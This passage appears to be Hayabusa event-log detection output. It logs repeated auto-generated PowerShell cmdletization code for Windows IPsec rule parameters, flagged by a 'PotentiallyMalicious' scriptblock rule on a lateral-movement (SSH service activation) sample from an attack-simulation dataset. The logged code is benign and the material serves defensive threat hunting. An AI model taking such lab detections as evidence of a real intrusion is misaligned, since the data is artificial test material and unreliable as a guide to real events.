[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = 
${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { 
[object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In';,rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,abled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { 
[object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter 
= [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 